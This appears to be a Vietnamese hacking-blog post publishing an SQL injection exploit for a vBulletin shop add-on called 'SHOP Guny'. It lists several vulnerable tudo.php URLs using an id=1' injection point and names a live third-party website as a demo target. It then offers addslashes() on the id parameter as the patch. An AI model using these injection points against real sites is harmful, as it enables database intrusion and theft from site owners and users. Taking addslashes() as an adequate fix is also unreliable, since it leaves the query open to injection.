Trang chủ
»
Hacking and Security
»
SQL Injection
»
TUTORIALS
»
vBulletin
» Bug SHOP Guny Cương Hóa Guny
19 thg 4, 2013
Bug SHOP Guny Cương Hóa Guny
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## ## Exploit Title: SHOP Guny Cương Hóa Guny #
# Google Dork: n/a #
# Date: 16/4/13 #
# Exploit Author: VnDragon - VHB #
# Code Mod: http://www.vietvbb.vn/up/showthread.php?t=67076 #
# Version: [2.0.1] #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # ## ## #
Code:
Exploit: http://victim.com/tudo.php?tudo=matkieng&id=1' [SQL]
Exploit: http://victim.com/tudo.php?tudo=mat&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=ao&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=toc&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=non&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=trangsuc&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=canh&id=1' [SQL]
Exploit: http://http://victim.com/tudo.php?tudo=vukhi&id=1' [SQL]
PHP Code:
$id = $_GET['id']; Find
PHP Code:
$id = $_GET['id']; PHP Code:
$id = addslashes($_GET['id']); Demo: http://jrockhome.com/tudo.php?tudo=mat&id=1'
Note: Phải có items mới tiến hành exploit được.
![[Tutorial] XSS Bài 2: XSS Nâng cao + Bypass bộ lọc](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixEoUmpwXUmG6BwNUxkp2bx9LwFoIovVmTOD9ZZ_owzNehJ3jW-beXvaWzjpu7tCCpOzOkzIxz-wIwL9Dt8_YxyKl604U03Hd3Z1E3mlDvIB0u0IIf-WtvpXRfkgSv0Y9BzB9EkC6J0uI/s72-c/70.jpg)
Không có nhận xét nào:
Đăng nhận xét